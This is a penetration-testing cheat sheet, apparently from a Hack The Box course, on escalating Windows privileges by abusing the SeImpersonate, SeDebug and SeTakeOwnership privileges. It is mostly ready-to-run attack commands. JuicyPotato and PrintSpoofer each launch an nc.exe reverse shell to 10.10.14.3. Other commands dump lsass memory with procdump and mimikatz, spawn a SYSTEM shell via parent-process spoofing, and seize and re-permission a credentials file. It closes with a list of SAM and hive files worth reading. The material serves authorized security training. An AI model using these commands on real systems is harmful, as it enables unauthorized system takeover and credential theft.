Windows User Privileges
SeImpersonate Privilege
Attackers often abuse this privilege in the "Potato style" privescs - where a service account can SeImpersonate, but not obtain full SYSTEM level privileges.
JuicyPatato Method
https://github.com/ohpe/juicy-potato
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
PrintSpoofer Method
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. https://github.com/itm4n/PrintSpoofer
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
SeDebugPrivilege
To run a particular application or service or assist with troubleshooting, a user might be assigned the SeDebugPrivilege instead of adding the account into the administrators group.
We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.
Dump Lsass
1 Dump lsass Process
procdump.exe -accepteula -ma lsass.exe lsass.dmp
2 Mimikatz Dump lsass Dump
# Specify Dump File
sekurlsa::minidump lsass.dmp
# Dump Creds
sekurlsa::logonpasswords
RCE
https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
1 List Processes
tasklist /svc
2 Use PoC Script
[MyProcess]::CreateProcessFromParent(612,"c:\Windows\System32\cmd.exe","")
SeTakeOwnershipPrivilege
SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.
https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1
1 Enable Privilege
# Import Module
Import-Module .\Enable-Privilege.ps1
# Run Script
.\EnableAllTokenPrivs.ps1
# Verify
whoami /priv
2 Check OwnerShip File
cmd /c dir /q 'C:\Department Shares\Private\IT'
3 Taking Ownership File
takeown /f 'C:\Department Shares\Private\IT\cred.txt'
4 Confirming Ownership
Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
5 Modify ACL on File
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
Interesting Files to Read
c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
Last updated